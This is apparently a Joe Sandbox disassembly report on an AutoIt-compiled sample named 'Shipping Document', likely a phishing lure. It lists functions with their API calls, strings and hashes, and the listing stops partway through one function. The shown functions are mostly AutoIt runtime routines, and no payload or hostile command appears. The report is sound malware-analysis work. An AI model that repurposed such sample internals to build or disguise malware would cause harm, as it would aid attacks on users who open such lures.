Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: aaf0ab19ab341205bf071bd254bf8bfac9cadae145f1310b7c477f0b00fff8c6
Instruction ID: a806223dea2b7766698c591388e88b9022bee6284c49b7afeff992ae8e258a9c
Opcode Fuzzy Hash: aaf0ab19ab341205bf071bd254bf8bfac9cadae145f1310b7c477f0b00fff8c6
Instruction Fuzzy Hash: 310291B590011AEFDB24DFA8DD89EAE7BB9FF48310F048158F945AB295CB759D00CB60

Function 010437F3 Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,0104F910), ref: 010438AF
IsWindowVisible.USER32(?), ref: 010438D3

Strings

SENDCOMMANDID, xrefs: 01043C62
GETCURRENTCOL, xrefs: 01043BB0
EDITPASTE, xrefs: 01043BE7
GETSELECTED, xrefs: 01043B2B
ADDSTRING, xrefs: 0104399E
GETCURRENTSELECTION, xrefs: 01043A6B
UNCHECK, xrefs: 01043B0B
GETCURRENTLINE, xrefs: 01043B75
TABRIGHT, xrefs: 01043925
DELSTRING, xrefs: 010439D1
ISVISIBLE, xrefs: 010438BF
SETCURRENTSELECTION, xrefs: 01043A3E
TABLEFT, xrefs: 0104390F
CURRENTTAB, xrefs: 01043945
GETLINECOUNT, xrefs: 01043B4E
GETLINE, xrefs: 01043C23
SHOWDROPDOWN, xrefs: 01043968
CHECK, xrefs: 01043AF5
HIDEDROPDOWN, xrefs: 01043988
ISCHECKED, xrefs: 01043AC1
ISENABLED, xrefs: 010438F3
SELECTSTRING, xrefs: 01043A8E
FINDSTRING, xrefs: 010439FE

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: BuffCharUpperVisibleWindow
String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
API String ID: 4105515805-45149045
Opcode ID: 1a3d27777b9f109d2aa48a65ad20f8c7ad465acc97dea38d97735c127f4793ca
Instruction ID: bff33928ad77d62b5d91dff93ed824c5d3bab580008c655bf7222bb45805b8e1
Opcode Fuzzy Hash: 1a3d27777b9f109d2aa48a65ad20f8c7ad465acc97dea38d97735c127f4793ca
Instruction Fuzzy Hash: B0D1B170204316DBCB24EF15C995AAE7BE1BF94354F00446CB8C65F2A2CF79E94ACB85

Function 0104A849 Relevance: 49.8, APIs: 33, Instructions: 274COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 0104A89F
GetSysColorBrush.USER32(0000000F), ref: 0104A8D0
GetSysColor.USER32(0000000F), ref: 0104A8DC
SetBkColor.GDI32(?,000000FF), ref: 0104A8F6
SelectObject.GDI32(?,?), ref: 0104A905
InflateRect.USER32(?,000000FF,000000FF), ref: 0104A930
GetSysColor.USER32(00000010), ref: 0104A938
CreateSolidBrush.GDI32(00000000), ref: 0104A93F
FrameRect.USER32(?,?,00000000), ref: 0104A94E
DeleteObject.GDI32(00000000), ref: 0104A955
InflateRect.USER32(?,000000FE,000000FE), ref: 0104A9A0
FillRect.USER32(?,?,?), ref: 0104A9D2
GetWindowLongW.USER32(?,000000F0), ref: 0104A9FD

Part of subcall function 0104AB60: GetSysColor.USER32(00000012), ref: 0104AB99
Part of subcall function 0104AB60: SetTextColor.GDI32(?,?), ref: 0104AB9D
Part of subcall function 0104AB60: GetSysColorBrush.USER32(0000000F), ref: 0104ABB3
Part of subcall function 0104AB60: GetSysColor.USER32(0000000F), ref: 0104ABBE
Part of subcall function 0104AB60: GetSysColor.USER32(00000011), ref: 0104ABDB
Part of subcall function 0104AB60: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0104ABE9
Part of subcall function 0104AB60: SelectObject.GDI32(?,00000000), ref: 0104ABFA
Part of subcall function 0104AB60: SetBkColor.GDI32(?,00000000), ref: 0104AC03
Part of subcall function 0104AB60: SelectObject.GDI32(?,?), ref: 0104AC10
Part of subcall function 0104AB60: InflateRect.USER32(?,000000FF,000000FF), ref: 0104AC2F
Part of subcall function 0104AB60: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0104AC46
Part of subcall function 0104AB60: GetWindowLongW.USER32(00000000,000000F0), ref: 0104AC5B

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
String ID:
API String ID: 4124339563-0
Opcode ID: 861b8481e89d121ef4df4aa023d4c0d186671f7e99ee7c8b2eb161a19b2633ae
Instruction ID: c42c9059b6e0cb47b1241efff7f2a83a07509ef2c2443709bb46f9ef6a159a9d
Opcode Fuzzy Hash: 861b8481e89d121ef4df4aa023d4c0d186671f7e99ee7c8b2eb161a19b2633ae
Instruction Fuzzy Hash: 31A1A2B5108302EFD7219F68DD88A5B7BE9FF89321F000A29FAA2971D1D735D844CB51

Function 00FC2C18 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?), ref: 00FC2CA2
DeleteObject.GDI32(00000000), ref: 00FC2CE8
DeleteObject.GDI32(00000000), ref: 00FC2CF3
DestroyIcon.USER32(00000000,?,?,?), ref: 00FC2CFE
DestroyWindow.USER32(00000000,?,?,?), ref: 00FC2D09
SendMessageW.USER32(?,00001308,?,00000000), ref: 00FFC68B
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00FFC6C4
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00FFCAED

Part of subcall function 00FC1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00FC2036,?,00000000,?,?,?,?,00FC16CB,00000000,?), ref: 00FC1B9A

SendMessageW.USER32(?,00001053), ref: 00FFCB2A
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00FFCB41
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00FFCB57
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00FFCB62

Strings

0, xrefs: 00FFC981

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
String ID: 0
API String ID: 464785882-4108050209
Opcode ID: b40a9af67b01e42d17074cc23e799de85a7a121e38015b9eae71dfaf0dac1079
Instruction ID: b8cae5465f6a3d910a9bceb3e2a529d98a33003a45fe3a0582e25c298c87d196
Opcode Fuzzy Hash: b40a9af67b01e42d17074cc23e799de85a7a121e38015b9eae71dfaf0dac1079
Instruction Fuzzy Hash: 3012A03590021AEFDB24DF24CA85BB9BBE1FF44320F14456DEA85DB262C735E841EB90

Function 010377BE Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 010377F1
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 010378B0
SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 010378EE
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 01037900
CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 01037946
GetClientRect.USER32(00000000,?), ref: 01037952
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 01037996
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 010379A5
GetStockObject.GDI32(00000011), ref: 010379B5
SelectObject.GDI32(00000000,00000000), ref: 010379B9
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 010379C9
GetDeviceCaps.GDI32(00000000,0000005A), ref: 010379D2
DeleteDC.GDI32(00000000), ref: 010379DB
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 01037A07
SendMessageW.USER32(00000030,00000000,00000001), ref: 01037A1E
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 01037A59
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 01037A6D
SendMessageW.USER32(00000404,00000001,00000000), ref: 01037A7E
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 01037AAE
GetStockObject.GDI32(00000011), ref: 01037AB9
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 01037AC4
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 01037ACE

Strings

DISPLAY, xrefs: 0103799B
static, xrefs: 01037990, 01037AA8
AutoIt v3, xrefs: 0103793E
msctls_progress32, xrefs: 01037A4F

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: 403b5516b61653b0a588cac2d789b68cbe17b1a7beecf85b93f8ed068dcba8de
Instruction ID: a504dc59e669b91f2887219447487e92a680361c7a1de9778b946d7592efaee4
Opcode Fuzzy Hash: 403b5516b61653b0a588cac2d789b68cbe17b1a7beecf85b93f8ed068dcba8de
Instruction Fuzzy Hash: 95A196B5A40606BFEB24DF68DD4AFAE7BB9EB44710F014154FA54A71D0C779AD00CB60

Function 0102AF7B Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0102AF89
GetDriveTypeW.KERNEL32(?,0104FAC0,?,\\.\,0104F910), ref: 0102B066
SetErrorMode.KERNEL32(00000000,0104FAC0,?,\\.\,0104F910), ref: 0102B1C4

Strings

Virtual, xrefs: 0102B18C
Removable, xrefs: 0102B0B8
PhysicalDrive, xrefs: 0102B012
Fixed, xrefs: 0102B0AE
Network, xrefs: 0102B0A4
ATA, xrefs: 0102B13F
FileBackedVirtual, xrefs: 0102B193
SSA, xrefs: 0102B14D
SAS, xrefs: 0102B170
Fibre, xrefs: 0102B154
USB, xrefs: 0102B15B
SSD, xrefs: 0102B0F1
ATAPI, xrefs: 0102B138
iSCSI, xrefs: 0102B169
CDROM, xrefs: 0102B09A
\\.\, xrefs: 0102AFDB
SATA, xrefs: 0102B177
SCSI, xrefs: 0102B131
RAMDisk, xrefs: 0102B090
Unknown, xrefs: 0102B086, 0102B12A
MMC, xrefs: 0102B185
1394, xrefs: 0102B146
RAID, xrefs: 0102B162

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 007681081fcdf35d0882d36edb6258f1ef7f175fc2ab3016000ed6c37aeebe99
Instruction ID: 0218adf4346e0520db469ca07c4e59ace30f7f94e9241b97c4a168295f6f3456
Opcode Fuzzy Hash: 007681081fcdf35d0882d36edb6258f1ef7f175fc2ab3016000ed6c37aeebe99
Instruction Fuzzy Hash: 3651D130B84716EBCB10EB15CE92DBCB7B0FB54641764805EF4CBAB250CA79AD41CB45

Function 00FC6A3C Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00FC6A91
__wcsnicmp.LIBCMT ref: 00FC6AA9
__wcsnicmp.LIBCMT ref: 00FC6AC1
__wcsnicmp.LIBCMT ref: 00FC6AD9
__wcsnicmp.LIBCMT ref: 00FC6AF1
__wcsnicmp.LIBCMT ref: 00FC6B09
__wcsnicmp.LIBCMT ref: 00FC6B21
__wcsnicmp.LIBCMT ref: 00FC6B35
__wcsnicmp.LIBCMT ref: 00FC6B76
__wcsnicmp.LIBCMT ref: 00FC6B8A
__wcsnicmp.LIBCMT ref: 00FC6B9E
__wcsnicmp.LIBCMT ref: 00FC6BB2

Strings

#OnAutoItStartRegister, xrefs: 00FC6AD3
#comments-end, xrefs: 00FC6B98
Bad directive syntax error, xrefs: 00FFE743
#include, xrefs: 00FC6B03
#notrayicon, xrefs: 00FC6AA3
#pragma compile, xrefs: 00FC6A8B
#ce, xrefs: 00FC6BAC
Unterminated group of comments, xrefs: 00FFE82C
#cs, xrefs: 00FC6B2F, 00FC6B84
#include-once, xrefs: 00FC6AEB
#requireadmin, xrefs: 00FC6ABB
Cannot parse #include, xrefs: 00FFE819
#comments-start, xrefs: 00FC6B1B, 00FC6B70

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 1038674560-86951937
Opcode ID: d91eddaee86579fa250420dbb9fe201e7dbc677d0db4fca6635e10eebd95f46e
Instruction ID: 59d236a816cd00372725bd10534d8511f77ecc2d121c9c008cfe9c33b7e17e9e
Opcode Fuzzy Hash: d91eddaee86579fa250420dbb9fe201e7dbc677d0db4fca6635e10eebd95f46e
Instruction Fuzzy Hash: 79814A71A04247ABCB24BE21CE97FBF3759AF14710F044029FD41EA0A1EB69DE41F690

Function 0104AB60 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 0104AB99
SetTextColor.GDI32(?,?), ref: 0104AB9D
GetSysColorBrush.USER32(0000000F), ref: 0104ABB3
GetSysColor.USER32(0000000F), ref: 0104ABBE
CreateSolidBrush.GDI32(?), ref: 0104ABC3
GetSysColor.USER32(00000011), ref: 0104ABDB
CreatePen.GDI32(00000000,00000001,00743C00), ref: 0104ABE9
SelectObject.GDI32(?,00000000), ref: 0104ABFA
SetBkColor.GDI32(?,00000000), ref: 0104AC03
SelectObject.GDI32(?,?), ref: 0104AC10
InflateRect.USER32(?,000000FF,000000FF), ref: 0104AC2F
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0104AC46
GetWindowLongW.USER32(00000000,000000F0), ref: 0104AC5B
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0104ACA7
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0104ACCE
InflateRect.USER32(?,000000FD,000000FD), ref: 0104ACEC
DrawFocusRect.USER32(?,?), ref: 0104ACF7
GetSysColor.USER32(00000011), ref: 0104AD05
SetTextColor.GDI32(?,00000000), ref: 0104AD0D
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0104AD21
SelectObject.GDI32(?,0104A869), ref: 0104AD38
DeleteObject.GDI32(?), ref: 0104AD43
SelectObject.GDI32(?,?), ref: 0104AD49
DeleteObject.GDI32(?), ref: 0104AD4E
SetTextColor.GDI32(?,?), ref: 0104AD54
SetBkColor.GDI32(?,?), ref: 0104AD5E

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: 38a87b2424cf6bdd6a3fd9e6ba3aeba99a425ae3646226817c94fd49f20b3624
Instruction ID: 6676ae296849584af1c6c83f06e8f41e410f46f792a9a5e8c8fc8bfee03ee246
Opcode Fuzzy Hash: 38a87b2424cf6bdd6a3fd9e6ba3aeba99a425ae3646226817c94fd49f20b3624
Instruction Fuzzy Hash: EF6191B5900209EFDF219FA8DD88EAE7BB9FB08320F104565FA51AB291D7759940CF90

Function 01048C44 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 01048D34
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 01048D45
CharNextW.USER32(0000014E), ref: 01048D74
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 01048DB5
SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 01048DCB
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 01048DDC
SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 01048DF9
SetWindowTextW.USER32(?,0000014E), ref: 01048E45
SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 01048E5B
SendMessageW.USER32(?,00001002,00000000,?), ref: 01048E8C
_memset.LIBCMT ref: 01048EB1
SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 01048EFA
_memset.LIBCMT ref: 01048F59
SendMessageW.USER32(?,00001053,000000FF,?), ref: 01048F83
SendMessageW.USER32(?,00001074,?,00000001), ref: 01048FDB
SendMessageW.USER32(?,0000133D,?,?), ref: 01049088
InvalidateRect.USER32(?,00000000,00000001), ref: 010490AA
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 010490F4
SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 01049121
DrawMenuBar.USER32(?), ref: 01049130
SetWindowTextW.USER32(?,0000014E), ref: 01049158

Strings

0, xrefs: 010490C2

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
String ID: 0
API String ID: 1073566785-4108050209
Opcode ID: 39c0106074e5de4285ab2cc59bc4cd43ca6f03c31e5259f9e445de8d186a2409
Instruction ID: de15dfd70bf457fe1718f6b0d63df0b4ad0dc38b63ffbd1ea237b82dbd74e30c
Opcode Fuzzy Hash: 39c0106074e5de4285ab2cc59bc4cd43ca6f03c31e5259f9e445de8d186a2409
Instruction Fuzzy Hash: B1E1B4B4901209ABDF209FA5CCC8EEF7BB8FF09754F0085AAFA959A190D7758641CF50

Function 01044B16 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 01044C51
GetDesktopWindow.USER32 ref: 01044C66
GetWindowRect.USER32(00000000), ref: 01044C6D
GetWindowLongW.USER32(?,000000F0), ref: 01044CCF
DestroyWindow.USER32(?), ref: 01044CFB
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 01044D24
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 01044D42
SendMessageW.USER32(?,00000439,00000000,00000030), ref: 01044D68
SendMessageW.USER32(?,00000421,?,?), ref: 01044D7D
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 01044D90
IsWindowVisible.USER32(?), ref: 01044DB0
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 01044DCB
SendMessageW.USER32(?,00000411,00000001,00000030), ref: 01044DDF
GetWindowRect.USER32(?,?), ref: 01044DF7
MonitorFromPoint.USER32(?,?,00000002), ref: 01044E1D
GetMonitorInfoW.USER32(00000000,?), ref: 01044E37
CopyRect.USER32(?,?), ref: 01044E4E
SendMessageW.USER32(?,00000412,00000000), ref: 01044EB9

Strings

tooltips_class32, xrefs: 01044D1D
0, xrefs: 01044BFC
(, xrefs: 01044E2A

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: dc4745004e8933d05c654bea73b4708350c5a05d6df386f21259467189a0cf67
Instruction ID: 48e894bc250555cd757f3059c0f09554ca2ae632cf322b66d37acf1c0f890e91
Opcode Fuzzy Hash: dc4745004e8933d05c654bea73b4708350c5a05d6df386f21259467189a0cf67
Instruction Fuzzy Hash: 14B17DB1608341AFD754DF29C989B5ABBE4BF88310F00892CF5D9DB291DB75D804CB95

Function 010246D6 Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 010246E8
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 0102470E
_wcscpy.LIBCMT ref: 0102473C
_wcscmp.LIBCMT ref: 01024747
_wcscat.LIBCMT ref: 0102475D
_wcsstr.LIBCMT ref: 01024768
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 01024784
_wcscat.LIBCMT ref: 010247CD
_wcscat.LIBCMT ref: 010247D4
_wcsncpy.LIBCMT ref: 010247FF

Strings

%u.%u.%u.%u, xrefs: 01024862
StringFileInfo\, xrefs: 01024757
\VarFileInfo\Translation, xrefs: 0102477C
04090000, xrefs: 010247BA
DefaultLangCodepage, xrefs: 010247E7

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 699586101-1459072770
Opcode ID: 226ed16d69e01a6aaab11c230698854de4c8a7a402491d0acbb1b72f3f901a7b
Instruction ID: 20769d3fed07107bafff9641fce845a0715074dc252447592b4869b3ac95152c
Opcode Fuzzy Hash: 226ed16d69e01a6aaab11c230698854de4c8a7a402491d0acbb1b72f3f901a7b
Instruction Fuzzy Hash: 64416B71A00291BBE710B77A9C47EBF77BCEF01710F04016AF941E7142EB79A601A7A5

Function 00FC27D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00FC28BC
GetSystemMetrics.USER32(00000007), ref: 00FC28C4
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00FC28EF
GetSystemMetrics.USER32(00000008), ref: 00FC28F7
GetSystemMetrics.USER32(00000004), ref: 00FC291C
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00FC2939
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00FC2949
